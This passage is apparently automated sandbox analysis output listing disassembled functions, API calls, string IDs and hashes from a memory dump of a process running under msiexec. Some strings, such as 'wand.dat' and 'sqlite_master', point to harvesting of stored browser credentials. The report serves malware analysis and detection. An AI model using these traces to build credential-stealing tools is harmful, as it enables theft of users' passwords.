                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                            • String ID: *.*$dat$wand.dat
                                                                                            • API String ID: 2618321458-1828844352
                                                                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                            APIs
                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                            • wcslen.MSVCRT ref: 00410C74
                                                                                            • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1549203181-0
                                                                                            • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                            • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00412057
                                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3550944819-0
                                                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
APIs
• free.MSVCRT ref: 0040F561
• memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
• memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$free
• String ID: g4@
• API String ID: 2888793982-2133833424
APIs
• memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
• memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
• memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
• memset.MSVCRT ref: 0040AF18
• memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
• ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
APIs
• memset.MSVCRT ref: 004144E7
  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
• memset.MSVCRT ref: 0041451A
• GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
• String ID:
• API String ID: 1127616056-0
APIs
• memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
• memset.MSVCRT ref: 0042FED3
• memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID: sqlite_master
• API String ID: 438689982-3163232059
APIs
• SHGetMalloc.SHELL32(?), ref: 00414D9A
• SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
• wcscpy.MSVCRT ref: 00414DF3
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: BrowseFolderFromListMallocPathwcscpy
• String ID:
• API String ID: 3917621476-0
APIs
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
• _snwprintf.MSVCRT ref: 00410FE1
• SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• _snwprintf.MSVCRT ref: 0041100C
• wcscat.MSVCRT ref: 0041101F
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
• String ID:
• API String ID: 822687973-0
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
• malloc.MSVCRT ref: 00417459
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
• free.MSVCRT ref: 0041747F
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 00412403
• RegisterClassW.USER32(?), ref: 00412428
• GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
• CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: HandleModule$ClassCreateRegisterWindow
• String ID:
• API String ID: 2678498856-0
APIs
• GetDlgItem.USER32(?,?), ref: 00409B40
• SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
• SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: MessageSend$Item
• String ID:
• API String ID: 3888421826-0
APIs
• memset.MSVCRT ref: 00417B7B
• UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
• LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
• GetLastError.KERNEL32 ref: 00417BB5
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: File$ErrorLastLockUnlockmemset
• String ID:
• API String ID: 3727323765-0
APIs
• memset.MSVCRT ref: 0040F673
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
• strlen.MSVCRT ref: 0040F6A2
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
APIs
• memset.MSVCRT ref: 0040F6E2
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
• strlen.MSVCRT ref: 0040F70D
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00402FD7
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                            • strlen.MSVCRT ref: 00403006
                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2754987064-0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$CloseHandle
                                                                                            • String ID: General
                                                                                            • API String ID: 3722638380-26480598
                                                                                            APIs
                                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                            • String ID:
                                                                                            • API String ID: 764393265-0
                                                                                            APIs
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$System$File$LocalSpecific
                                                                                            • String ID:
                                                                                            • API String ID: 979780441-0
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                                            • String ID:
                                                                                            • API String ID: 1386444988-0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: InvalidateMessageRectSend
                                                                                            • String ID: d=E
                                                                                            • API String ID: 909852535-3703654223
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 0040F79E
                                                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcschr$memcpywcslen
                                                                                            • String ID: "
                                                                                            • API String ID: 1983396471-123907689
                                                                                            APIs
                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                            • _memicmp.MSVCRT ref: 0040C00D
                                                                                            • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer_memicmpmemcpy
                                                                                            • String ID: URL
                                                                                            • API String ID: 2108176848-3574463123
                                                                                            APIs
                                                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfmemcpy
                                                                                            • String ID: %2.2X
                                                                                            • API String ID: 2789212964-323797159
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf
                                                                                            • String ID: %%-%d.%ds
                                                                                            • API String ID: 3988819677-2008345750
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040E770
                                                                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendmemset
                                                                                            • String ID: F^@
                                                                                            • API String ID: 568519121-3652327722
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PlacementWindowmemset
                                                                                            • String ID: WinPos
                                                                                            • API String ID: 4036792311-2823255486
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@DeleteObject
                                                                                            • String ID: r!A
                                                                                            • API String ID: 1103273653-628097481
                                                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                            APIs
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                            • wcscat.MSVCRT ref: 0040DCFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                                                            • String ID: _lng.ini
                                                                                            • API String ID: 383090722-1948609170
                                                                                            • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                            • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                            • API String ID: 2773794195-880857682
                                                                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                            • memset.MSVCRT ref: 0042BAAE
                                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID:
                                                                                            • API String ID: 438689982-0
                                                                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                            APIs
                                                                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$memset
                                                                                            • String ID:
                                                                                            • API String ID: 1860491036-0
                                                                                            • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                            • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040A908
                                                                                            • free.MSVCRT ref: 0040A92B
                                                                                            • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 726966127-0
                                                                                            • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                            • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                                            • free.MSVCRT ref: 0040B201
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040B224
